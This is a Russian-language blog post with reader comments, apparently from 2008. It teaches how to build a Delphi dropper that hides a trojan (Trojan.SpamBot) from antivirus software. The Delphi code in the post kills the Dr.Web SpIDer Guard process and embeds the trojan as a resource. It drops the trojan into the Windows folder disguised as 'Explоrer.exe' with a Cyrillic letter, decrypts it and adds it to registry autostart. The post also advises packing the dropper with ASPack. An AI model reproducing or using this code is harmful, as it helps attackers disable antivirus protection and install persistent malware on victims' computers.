Закрыть
Все сервисы
Главная
Лента заметок
Теги
Группы
Рейтинги

Скрываем Вирус от Антивируса..

25 мая´08 22:55 Просмотров: 893 Комментариев: 6
Зачем должен быть зашифрован вирус? Объясню. При копировании программы-защитника на компьютер или его запуске антивирус произведет проверку файла на наличие вируса. Если файл будет сжат, да еще и зашифрован, то антивирус не сможет распознать вирус.


Давайте напишем программу-защитник. Вирусом будет Trojan.SpamBot (выбран из-зи малого веса). Программа антивирус будет Dr.WEB. В нашем примере мы не будем сжимать файл.


Откройте Delphi и создайте новый проект. Назовите его VirDefender. Уберите все Units из проекта и оставьте только Project1.exe. Переделайте код так, чтобы осталось только:


program VirDefendor;


uses
Windows;


begin




end.


Объявим одну константу PROCESS_TERMINATE = $0001 и глобальные переменные:
ProcessHandle : THandle
ProcessID: Integer
TheWindow : HWND
ResType, ResName, ResNewName : String;
Res : TResourceStream;
WinDir: String; // путь к винде
Buffer: array[0..1023] of Char;


Теперь пишем код завершающий работу антивируса:


try
TheWindow := FindWindow(nil, PChar('SpIDer Guard')); // поиск окна
GetWindowThreadProcessID(TheWindow, @ProcessID);
ProcessHandle := OpenProcess(PROCESS_TERMINATE, FALSE, ProcessId);
TerminateProcess(ProcessHandle,4);
except
Halt; // если что - завершаем процесс
end;




Теперь добавим вирус в программу. Создаем файл с расширением .rc (Например Virus.rc). Далее открываем его и пишем следующее:


Virus EXEFILE C:\Virus.exe


Объясняю: Virus - имя файла, EXEFILE - тип файла, C:\Virus.exe - путь к файлу.


Так, написали. Далее открываем паку с Delphi и ищем там файл brc32.exe (У меня это C:\Program Files\Borland\BDS\3.0\Bin\brc32.exe). Перетаскиваем на него файл Virus.rc. Появится консоль, че-то там сделает и у тебя, если ты все правильно написал в файле Virus.rc должен появиться файл Virus.res. Этот файл надо добавить к проекту (просто под строкой {$R *.dfm} написать {$R Virus.res} ). Далее откомпилируй прогу (Ctrl+F9). Если ты все правильно сделал, то компилятор не высветит никакой ошибки. Далее чтобы извлечь файл из проги надо написать следующий алгоритм:


SetString(WinDir, Buffer, GetWindowsDirectory(Buffer, SizeOf(Buffer))); // получаем путь к папке Windows
Res := TResourceStream.Create(Hinstance,'VIRUS', Pchar('EXEFILE'));
Res.SavetoFile(WinDir+'\Explоrer.exe'); // В этом имени буква о - русская
Res.Free;

Сейчас напише функцию расшифровки файла:


// Дешифрование файла:
AssignFile (F, WinDir+'\Explоrer.exe');
Reset (F);
while not EOF (F) do
begin
Read (F, B);
Seek (F, FilePos (F) - 1);
Dec (B);
Write (F, B);
CloseFile (F);
end;


Вот в принципе и все. Хотя нет! Стоп! Надо записать еще файл в автозапуск. Для этого добавте модуль Registry, переменную reg: TRegistry и напишите в программу следующий алгоритм:


Reg:=TREgistry.Create; // регистрируем для автозапуска
Reg.RootKey:=HKEY_LOCAL_MACHINE;
Reg.OpenKey('Software\Microsoft\Windows\CurrentVersion\Run',true);
Reg.WriteString('Explorer',WinDir+'\Explоrer.exe');
Reg.CloseKey;
Reg.Free;


Теперь все. Компилируйте и проверяйте.


P.S. Совет - сожмите программу-защитник прогой ASPack.
Пожаловаться
Комментариев (6)
Отсортировать по дате Вниз
Mefest0fel    03.04.2009, 04:49
Оценка:  0
Mefest0fel
афигеть дельфи рулс!!!!!!!! :62: :62: :62: :62: :62:
Vampire133    31.05.2008, 21:14
Оценка:  0
Vampire133
спс..нащет этого слышал раньше и знал, но никогда не проверял, теперь на 100% знаю что правад)) спс...статья 9 с + ))) :05:
Alexsius    30.05.2008, 00:31
Оценка:  0
Alexsius
В общем при скачке Файликса->>>>>Join er>>>////\/\/\/\/\/\Troj an)))
Alexsius    30.05.2008, 00:23
Оценка:  0
Alexsius
Кев на сайте вир Троян гуляет уже нашол))http://www.web-hack.ru/dow nload/index.php?........... .........Ну ты понял)))
koma_Ledy    29.05.2008, 07:04
Оценка:  0
koma_Ledy
у тебя это все голое???? не пойму ни одного слоа.пипец просто,ты что употребляешь чтобы все это знать,мась? :62:
KevinMitnick    29.05.2008, 07:04
Оценка:  0
KevinMitnick
ничего.просто мне интересно..))
Реклама
Реклама